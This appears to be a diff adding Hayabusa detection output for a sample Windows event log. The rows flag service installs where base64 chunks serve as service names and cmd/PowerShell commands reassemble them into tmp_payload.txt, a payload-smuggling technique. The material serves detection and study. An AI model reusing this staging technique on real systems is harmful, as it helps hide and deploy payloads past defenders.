+2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
